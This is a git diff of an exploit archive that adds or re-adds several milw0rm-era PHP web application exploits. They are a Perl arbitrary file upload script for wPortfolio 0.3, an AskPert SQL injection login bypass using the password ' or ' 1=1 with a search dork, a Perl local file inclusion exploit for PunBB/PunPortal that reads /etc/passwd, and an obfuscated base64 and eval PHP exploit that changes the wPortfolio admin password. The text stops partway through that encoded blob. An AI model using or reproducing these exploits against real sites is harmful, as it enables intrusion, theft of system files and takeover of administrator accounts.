+# Contact: osirys[at]live[dot]it
+# Proud to be Italian 
+# Thx: athos
+
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+my $path        = "/admin/upload_form.php";
+my $d_fold      = "/admin/tmp/"; 
+my($host,$file) = ($ARGV[0],$ARGV[1]);
+
+($host,$file) || help("-1");
+cheek($host) == 1 || help("-2");
+&banner;
+my $url = $host.$path;
+
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url,
+                      Content_Type => 'form-data',
+                      Content      => [file_to_upload => [$file]] 
+                      );
+
+if ($re->is_success) {
+    print "[+] Uploaded ! \n";
+    print "[+] Link: ".$host.$d_fold.$file." \n";
+}
+else {
+    print "[-] Upload failed ! \n";
+}
+
+sub cheek() {
+    my $host = $_[0];
+    if ($host =~ /http:\/\/(.*)/) {
+        return 1;
+    }
+    else {
+        return 0;
+    }
+}
+
+sub banner {
+    print "\n".
+          "  ========================================== \n".
+          "     wPortfolio 0.3 Arbitrary File Upload \n".
+          "     Author: Osirys \n".
+          "     osirys[at]live[dot]it \n".
+          "     Proud to be italian \n".
+          "  ========================================== \n\n";
+}
+
+sub help() {
+    my $error = $_[0];
+    if ($error == -1) {
+        &banner;
+        print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n";
+    }
+    elsif ($error == -2) {
+        &banner;
+        print "\n[-] Bad hostname address !\n";
+    }
+    print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n";
+    exit(0);
+}
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7166.txt b/platforms/php/webapps/7166.txt
index 7bd441ba6..747d4ad08 100755
--- a/platforms/php/webapps/7166.txt
+++ b/platforms/php/webapps/7166.txt
@@ -1,36 +1,36 @@
-##################WwW.TR-ShaRk.Co.cC###################
-#AskPert  (Auth bypass) SQL Injection Vulnerability
-##################WwW.TR-ShaRk.Co.cC###################
-
- ##################WwW.TR-ShaRk.Co.cC###################
- #[~] Author :  TR-ShaRk
- #[~] Msn : Starhack@tr-shark.org
- #[~] Web : WwW.TR-ShaRk.Co.cC
- #[~] I am Not Hacker
- #[~] Greetz :FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
- #[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
- #
- #[!] Script: http://www.w3matter.com/products/askpert
- #[!] Google_Dork:  Powered by AskPert
- ##################WwW.TR-ShaRk.Co.cC###################
-
-
- Go to ask/index.php?section=user&action=login
-
- Use following information to bypass login.
-
- Write any email Address as email address.It must to be in email format.
-
- For exapmple Starhack@TR-ShaRk.OrG
-
- For password use ' or ' 1=1
-
-
- #[~] LiveDemo:
- http://www.w3matter.com/ask/index.php?section=user&action=login
-
- ##################WwW.TR-ShaRk.Co.cC###################
- Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik | Ya Ezersin Yada Ezilirsin!
- ##################WwW.TR-ShaRk.Co.cC###################
-
-# milw0rm.com [2008-11-19]
+##################WwW.TR-ShaRk.Co.cC###################
+#AskPert  (Auth bypass) SQL Injection Vulnerability
+##################WwW.TR-ShaRk.Co.cC###################
+
+ ##################WwW.TR-ShaRk.Co.cC###################
+ #[~] Author :  TR-ShaRk
+ #[~] Msn : Starhack@tr-shark.org
+ #[~] Web : WwW.TR-ShaRk.Co.cC
+ #[~] I am Not Hacker
+ #[~] Greetz :FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
+ #[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
+ #
+ #[!] Script: http://www.w3matter.com/products/askpert
+ #[!] Google_Dork:  Powered by AskPert
+ ##################WwW.TR-ShaRk.Co.cC###################
+
+
+ Go to ask/index.php?section=user&action=login
+
+ Use following information to bypass login.
+
+ Write any email Address as email address.It must to be in email format.
+
+ For exapmple Starhack@TR-ShaRk.OrG
+
+ For password use ' or ' 1=1
+
+
+ #[~] LiveDemo:
+ http://www.w3matter.com/ask/index.php?section=user&action=login
+
+ ##################WwW.TR-ShaRk.Co.cC###################
+ Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik | Ya Ezersin Yada Ezilirsin!
+ ##################WwW.TR-ShaRk.Co.cC###################
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7168.pl b/platforms/php/webapps/7168.pl
index 56d379a5b..730317a59 100755
--- a/platforms/php/webapps/7168.pl
+++ b/platforms/php/webapps/7168.pl
@@ -1,117 +1,117 @@
-#!/usr/bin/perl
-
-=about
-
-    PunBB (PunPortal 0.1) Local File Inclusion Exploit
-    --------------------------------------------------
-    by athos - staker[at]hotmail[dot]it
-    download mod http://www.punres.org/download.php?id=1108
-    download cms http://punbb.org
-
-    register globals = 1
-    magic quotes gcp = 1
-    
-  
-    
-    File (include/login.php)
-    
-    1. <?php
-    2.
-    3. // Show login if not logged in
-    4. if($pun_user['is_guest'])
-    5. {
-    6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
-    7. {
-    8. 
-    9. // Load the language files
-    10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
-    11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
-    
-    
-    $pun_user['is_guest'] isn't declared
-    $pun_user['language'] isn't declared
-    
-    include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
-    
-    how to fix?use the latest version (2.0) 
-     
-    Usage: perl punbb.pl localhost/cms
-    
-=cut
-
-
-use strict;
-use warnings;
-use IO::Socket;
-
-
-my $html = undef;
-my $site = $ARGV[0] or &help;
-my @take = split /\//,$site;
-
-my ($host,$path) = @take;
-
-if($site =~ /http:\/\/(.+?)/i) {
-  print STDOUT "Invalid URL\n";
-  exit;
-}
-
-print STDOUT "Local File (ex: ../../etc/passwd)\n";
-print STDOUT "Local File: ";
-  
-chomp(my $file = <STDIN>);
-
-if(not defined($file)) {
-  print STDOUT "File Not Defined!\n";
-  exit;
-}
-
-
-my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";
-
-my $sock = new IO::Socket::INET(
-                                 PeerAddr => $host,
-                                 PeerPort => 80,
-                                 Proto    => 'tcp',
-                                 Timeout  => 6,
-                              ) or die $!;   
-
-my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
-           "Host: $host\r\n".
-           "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
-           "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
-           "Accept-Language: en-us,en;q=0.5\r\n".
-           "Accept-Encoding: gzip,deflate\r\n".
-           "Connection: close\r\n\r\n";
-
-$sock->send($data);
-
-while(<$sock>) {
-  $html .= $_;
-}           
-
-if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
-  print STDOUT "Exploit Failed!\n";
-  exit;
-}
-else {
-  my $name = int(rand(999)).'.txt';
-  
-  open(FILE,">",$name);
-  print FILE $html;
-  close(FILE);
-  
-  print STDOUT "Exploit Successfully!\n";
-  print STDOUT "$name saved!\n";
-  exit;
-}
-
-
-sub help {
-  print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
-               "by athos - staker[at]hotmail[dot]it\n".
-               "Usage: perl $0 [host/path]\n";
-  exit;
-}
-
-# milw0rm.com [2008-11-20]
+#!/usr/bin/perl
+
+=about
+
+    PunBB (PunPortal 0.1) Local File Inclusion Exploit
+    --------------------------------------------------
+    by athos - staker[at]hotmail[dot]it
+    download mod http://www.punres.org/download.php?id=1108
+    download cms http://punbb.org
+
+    register globals = 1
+    magic quotes gcp = 1
+    
+  
+    
+    File (include/login.php)
+    
+    1. <?php
+    2.
+    3. // Show login if not logged in
+    4. if($pun_user['is_guest'])
+    5. {
+    6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
+    7. {
+    8. 
+    9. // Load the language files
+    10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
+    11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
+    
+    
+    $pun_user['is_guest'] isn't declared
+    $pun_user['language'] isn't declared
+    
+    include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
+    
+    how to fix?use the latest version (2.0) 
+     
+    Usage: perl punbb.pl localhost/cms
+    
+=cut
+
+
+use strict;
+use warnings;
+use IO::Socket;
+
+
+my $html = undef;
+my $site = $ARGV[0] or &help;
+my @take = split /\//,$site;
+
+my ($host,$path) = @take;
+
+if($site =~ /http:\/\/(.+?)/i) {
+  print STDOUT "Invalid URL\n";
+  exit;
+}
+
+print STDOUT "Local File (ex: ../../etc/passwd)\n";
+print STDOUT "Local File: ";
+  
+chomp(my $file = <STDIN>);
+
+if(not defined($file)) {
+  print STDOUT "File Not Defined!\n";
+  exit;
+}
+
+
+my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";
+
+my $sock = new IO::Socket::INET(
+                                 PeerAddr => $host,
+                                 PeerPort => 80,
+                                 Proto    => 'tcp',
+                                 Timeout  => 6,
+                              ) or die $!;   
+
+my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
+           "Host: $host\r\n".
+           "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
+           "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
+           "Accept-Language: en-us,en;q=0.5\r\n".
+           "Accept-Encoding: gzip,deflate\r\n".
+           "Connection: close\r\n\r\n";
+
+$sock->send($data);
+
+while(<$sock>) {
+  $html .= $_;
+}           
+
+if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
+  print STDOUT "Exploit Failed!\n";
+  exit;
+}
+else {
+  my $name = int(rand(999)).'.txt';
+  
+  open(FILE,">",$name);
+  print FILE $html;
+  close(FILE);
+  
+  print STDOUT "Exploit Successfully!\n";
+  print STDOUT "$name saved!\n";
+  exit;
+}
+
+
+sub help {
+  print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
+               "by athos - staker[at]hotmail[dot]it\n".
+               "Usage: perl $0 [host/path]\n";
+  exit;
+}
+
+# milw0rm.com [2008-11-20]
diff --git a/platforms/php/webapps/7170.php b/platforms/php/webapps/7170.php
index bd400e37e..f3b2180dc 100755
--- a/platforms/php/webapps/7170.php
+++ b/platforms/php/webapps/7170.php
@@ -1,121 +1,121 @@
-<?php
-/*
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	wPortfolio <= 0.3 Admin Password Changing Exploit
-==============================================================================
-
-	[»] Script:             [ wPortfolio <= 0.3 ]
-	[»] Language:           [ PHP ]
-	[»] Webpage:            [ http://sourceforge.net/projects/wportfolio/ ]
-	[»] Type:               [ OS ]
-	[»] Report-Date:        [ 20.11.2008 ]
-	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]
-
-
-===[ XPL ]===*/
-
-                 
-                 $GNK = "ZWNobyAiPFRJVExFPndQb3J0Zm9saW8gPD0gMC4zIEFkbWluIFBhc3N3b3JkIENoYW5naW5nIEV4".
-			"cGxvaXQgfCBCeTogRzROMEs8L1RJVExFPiI7DQokRzROMEsgPSA8PDxFT0cNCj09PT09PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PQ0KICAgICAgICAgICAgICAgICAgICAgIF8gICAgICBfICAgICAgIF8gICAgICAg".
-			"ICAgXyAgICAgIF8gICBfIA0KICAgICAgICAgICAgICAgICAgICAgLyBcICAgIHwgfCAgICAgfCB8".
-			"ICAgICAgICAvIFwgICAgfCB8IHwgfA0KICAgICAgICAgICAgICAgICAgICAvIF8gXCAgIHwgfCAg".
-			"ICAgfCB8ICAgICAgIC8gXyBcICAgfCB8X3wgfA0KICAgICAgICAgICAgICAgICAgIC8gX19fIFwg".
-			"IHwgfF9fXyAgfCB8X19fICAgLyBfX18gXCAgfCAgXyAgfA0KICAgSU4gVEhFIE5BTUUgT0YgL18v".
-			"ICAgXF9cIHxfX19fX3wgfF9fX19ffCAvXy8gICBcX1wgfF98IHxffA0KICAgICAgICAgICAgICAg".
-			"ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQo9PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAgICAgICBfX19fICAgXyAgXyAgICAgXyAg".
-			"IF8gICAgX19fICAgIF8gIF9fDQogICAgICAgICAgICAgICAgICAgICAvIF9fX3wgfCB8fCB8ICAg".
-			"fCBcIHwgfCAgLyBfIFwgIHwgfC8gLw0KICAgICAgICAgICAgICAgICAgICB8IHwgIF8gIHwgfHwg".
-			"fF8gIHwgIFx8IHwgfCB8IHwgfCB8ICcgLyANCiAgICAgICAgICAgICAgICAgICAgfCB8X3wgfCB8".
-			"X18gICBffCB8IHxcICB8IHwgfF98IHwgfCAuIFwgDQogICAgICAgICBlWHBsbyF0IEJ5ICBcX19f".
-			"X3wgICAgfF98ICAgfF98IFxffCAgXF9fXy8gIHxffFxfXA0KDQo9PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT0NCgl3UG9ydGZvbGlvIDw9IDAuMyBBZG1pbiBQYXNzd29yZCBDaGFuZ2luZyBFeHBsb2l0DQo9".
-			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
-			"PT09PT09PT09PT09PT09PT09PT0NCg0KRU9HOw0KZWNobyAiPHByZT4iLiRHNE4wSy4iPC9wcmU+".
-			"IjskRk9STSA9ICI8YnIgLz48Rk9STSBhY3Rpb249XCIiLiRfU0VSVkVSWyJQSFBfU0VMRiJdLiJc".
-			"IiBtZXRob2Q9XCJQT1NUXCI+IjskRk9STS49IDw8PEZGRg0KICAgIDxQIHN0eWxlPSJ3aWR0aDog".
-			"MzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmct".
-			"bGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPExBQkVMIHN0".
-			"eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDogLTE1NXB4O3dp".
-			"ZHRoOjE1MHB4OyIgZm9yPSJNU0RHTksiPiBXZWJzaXRlIDogJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
-			"c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQog".
-			"ICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFt".
-			"ZT0iTVNER05LIiBpZD0iTVNER05LIj48YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2Vp".
-			"Z2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBm".
-			"b3I9IlBBVEgiPlBhdGg6ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1svd1BvcnRmb2xp".
-			"b108L0xBQkVMPg0KICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5".
-			"cGU9InRleHQiIG5hbWU9IlBBVEgiIGlkPSJQQVRIIiB2YWx1ZT0iLyI+PEJSPg0KICAgIDxQIHN0".
-			"eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhw".
-			"eCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQoJ".
-			"PExBQkVMIHN0eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDog".
-			"LTE1NXB4O3dpZHRoOjE1MHB4OyIgZm9yPSJucHciPiBOZXcgUGFzc3dvcmQgOiA8L0xBQkVMPg0K".
-			"ICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5cGU9InRleHQiIG5h".
-			"bWU9Im5wdyIgaWQ9Im5wdyI+PEJSPg0KCTxQIHN0eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxl".
-			"ZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9y".
-			"ZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPElOUFVUIHR5cGU9InN1Ym1pdCIgbmFt".
-			"ZT0ic3VibWl0IiB2YWx1ZT0iQ2hhbmdlIGl0ISI+IDxJTlBVVCB0eXBlPSJyZXNldCI+DQogICAg".
-			"PC9QPg0KIDwvRk9STT4NCkZGRjsNCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKXskbmV3X3B3".
-			"ZD1tZDUoJF9QT1NUWyducHcnXSk7JHBvc3Q9InNpdGVuYW1lPS0lMjB3ZWJwb3J0Zm9saW8lMjAt".
-			"Jl9zdGF0dXNiYXI9c3RhdHVzJTIwYmFyJmJhbm5lcj1jb3B5cmlnaHQmZW1haWw9bWFpbC5nYW5v".
-			"ayU0MGdtYWlsLmNvbSZwYXNzd29yZD0iLiRuZXdfcHdkLiImcGFzc3dvcmRfcmV0eXBlPSIuJG5l".
-			"d19wd2QuIlxyXG4iOyRqb2tlID0gIlBPU1QgLyIuJF9QT1NUWyJQQVRIIl0uIi9hZG1pbi91c2Vy".
-			"aW5mby5waHA/YWN0aW9uPWFjY291bnRfc2F2ZSBIVFRQLzEuMVxyXG5Ib3N0OiAiLiRfUE9TVFsi".
-			"TVNER05LIl0uIlxyXG5Vc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93".
-			"cyBOVCA1LjE7IGVuLVVTOyBydjoxLjkpIEdlY2tvLzIwMDgwNTI5MDYgRmlyZWZveC8zLjBcclxu".
-			"S2VlcC1BbGl2ZTogMzAwXHJcbkNvbm5lY3Rpb246IGtlZXAtYWxpdmVcclxuQ29udGVudC1UeXBl".
-			"OiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuQ29udGVudC1MZW5ndGg6IDE5".
-			"MFxyXG5cclxuIi4kcG9zdDskcmVzID0gIiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbIk1T".
-			"REdOSyJdLCI4MCIsJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAv".
-			"PldURiwgZXJyIzogKCRlcnJubykuJGVycnN0ciIpO3JldHVybjt9ZWNobygiPHNwYW4gc3R5bGU9".
-			"XCJmb250Om5vcm1hbCA4cHQgdGFob21hO1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5b".
-			"K10gPGI+U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2Up".
-			"O3doaWxlKCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRh".
-			"Y2spO2lmIChzdHJpc3RyKCRyZXMsICJzYXZlZCIpKXtlY2hvICJbK108Yj4gRXhwbG9pdGVkICEg".
-			"LCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3JkIGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAv".
-			"PiAgICAgWytdIC4uLjxiciAvPiAgICAgWytdIDxiPm5ldyBwYXNzd29yZDo8L2I+ICIuJF9QT1NU".
-			"WyducHcnXS4iPGJyIC8+ICAgICBbK108Yj4gYWRtaW4gcGFuZWw6PC9iPiBodHRwOi8vIi4kX1BP".
-			"U1RbIk1TREdOSyJdLiRfUE9TVFsiUEFUSCJdLiIvYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJy".
-			"IC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h".
-			"O2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8g".
-			"IlsrXTxiPiBPb3BzLCBzcnksIG5vdCB2dWxuLi4uITwvYj48YnIgLz5bIV0gPGk+ZG91YmxlIGNo".
-			"ZWNrIHlvdXIgaW5wdXQuLi48L2k+Ijt9Zmx1c2goKTt9ZWxzZXtlY2hvJEZPUk07fQ0K";
-		eval(base64_decode($GNK));
-
-/*
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 <Tornado2800[at]gmail.com> // bedone in nemishe :D
-	[»] Hussain-X <darkangel_g85[at]yahoo.com> // Jazakallah...
-	[»] Str0ke //Hey Brotha keep rocking on ;)
-	[»] Saudi-L0rd,Sakab...
-	[»] SMN,MSD-KiD,SED,AMD,MSN...
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================*/
-?>
-
-# milw0rm.com [2008-11-20]
+<?php
+/*
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	wPortfolio <= 0.3 Admin Password Changing Exploit
+==============================================================================
+
+	[»] Script:             [ wPortfolio <= 0.3 ]
+	[»] Language:           [ PHP ]
+	[»] Webpage:            [ http://sourceforge.net/projects/wportfolio/ ]
+	[»] Type:               [ OS ]
+	[»] Report-Date:        [ 20.11.2008 ]
+	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]
+
+
+===[ XPL ]===*/
+
+                 
+                 $GNK = "ZWNobyAiPFRJVExFPndQb3J0Zm9saW8gPD0gMC4zIEFkbWluIFBhc3N3b3JkIENoYW5naW5nIEV4".
+			"cGxvaXQgfCBCeTogRzROMEs8L1RJVExFPiI7DQokRzROMEsgPSA8PDxFT0cNCj09PT09PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PQ0KICAgICAgICAgICAgICAgICAgICAgIF8gICAgICBfICAgICAgIF8gICAgICAg".
+			"ICAgXyAgICAgIF8gICBfIA0KICAgICAgICAgICAgICAgICAgICAgLyBcICAgIHwgfCAgICAgfCB8".
+			"ICAgICAgICAvIFwgICAgfCB8IHwgfA0KICAgICAgICAgICAgICAgICAgICAvIF8gXCAgIHwgfCAg".
+			"ICAgfCB8ICAgICAgIC8gXyBcICAgfCB8X3wgfA0KICAgICAgICAgICAgICAgICAgIC8gX19fIFwg".
+			"IHwgfF9fXyAgfCB8X19fICAgLyBfX18gXCAgfCAgXyAgfA0KICAgSU4gVEhFIE5BTUUgT0YgL18v".
+			"ICAgXF9cIHxfX19fX3wgfF9fX19ffCAvXy8gICBcX1wgfF98IHxffA0KICAgICAgICAgICAgICAg".
+			"ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQo9PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAgICAgICBfX19fICAgXyAgXyAgICAgXyAg".
+			"IF8gICAgX19fICAgIF8gIF9fDQogICAgICAgICAgICAgICAgICAgICAvIF9fX3wgfCB8fCB8ICAg".
+			"fCBcIHwgfCAgLyBfIFwgIHwgfC8gLw0KICAgICAgICAgICAgICAgICAgICB8IHwgIF8gIHwgfHwg".
+			"fF8gIHwgIFx8IHwgfCB8IHwgfCB8ICcgLyANCiAgICAgICAgICAgICAgICAgICAgfCB8X3wgfCB8".
+			"X18gICBffCB8IHxcICB8IHwgfF98IHwgfCAuIFwgDQogICAgICAgICBlWHBsbyF0IEJ5ICBcX19f".
+			"X3wgICAgfF98ICAgfF98IFxffCAgXF9fXy8gIHxffFxfXA0KDQo9PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT0NCgl3UG9ydGZvbGlvIDw9IDAuMyBBZG1pbiBQYXNzd29yZCBDaGFuZ2luZyBFeHBsb2l0DQo9".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT0NCg0KRU9HOw0KZWNobyAiPHByZT4iLiRHNE4wSy4iPC9wcmU+".
+			"IjskRk9STSA9ICI8YnIgLz48Rk9STSBhY3Rpb249XCIiLiRfU0VSVkVSWyJQSFBfU0VMRiJdLiJc".
+			"IiBtZXRob2Q9XCJQT1NUXCI+IjskRk9STS49IDw8PEZGRg0KICAgIDxQIHN0eWxlPSJ3aWR0aDog".
+			"MzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmct".
+			"bGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPExBQkVMIHN0".
+			"eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDogLTE1NXB4O3dp".
+			"ZHRoOjE1MHB4OyIgZm9yPSJNU0RHTksiPiBXZWJzaXRlIDogJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
+			"c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQog".
+			"ICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFt".
+			"ZT0iTVNER05LIiBpZD0iTVNER05LIj48YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2Vp".
+			"Z2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBm".
+			"b3I9IlBBVEgiPlBhdGg6ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1svd1BvcnRmb2xp".
+			"b108L0xBQkVMPg0KICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5".
+			"cGU9InRleHQiIG5hbWU9IlBBVEgiIGlkPSJQQVRIIiB2YWx1ZT0iLyI+PEJSPg0KICAgIDxQIHN0".
+			"eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxlZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhw".
+			"eCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9yZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQoJ".
+			"PExBQkVMIHN0eWxlPSJmb250LXdlaWdodDogYm9sZDtmbG9hdDogbGVmdDttYXJnaW4tbGVmdDog".
+			"LTE1NXB4O3dpZHRoOjE1MHB4OyIgZm9yPSJucHciPiBOZXcgUGFzc3dvcmQgOiA8L0xBQkVMPg0K".
+			"ICAgICAgICAgICAgICA8SU5QVVQgc3R5bGU9IndpZHRoOiAxODBweDsiIHR5cGU9InRleHQiIG5h".
+			"bWU9Im5wdyIgaWQ9Im5wdyI+PEJSPg0KCTxQIHN0eWxlPSJ3aWR0aDogMzAwcHg7Y2xlYXI6IGxl".
+			"ZnQ7bWFyZ2luOiAwO3BhZGRpbmc6IDVweCAwIDhweCAwO3BhZGRpbmctbGVmdDogMTU1cHg7Ym9y".
+			"ZGVyLXRvcDogMXB4IGRhc2hlZCBncmF5OyI+DQogICAgPElOUFVUIHR5cGU9InN1Ym1pdCIgbmFt".
+			"ZT0ic3VibWl0IiB2YWx1ZT0iQ2hhbmdlIGl0ISI+IDxJTlBVVCB0eXBlPSJyZXNldCI+DQogICAg".
+			"PC9QPg0KIDwvRk9STT4NCkZGRjsNCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKXskbmV3X3B3".
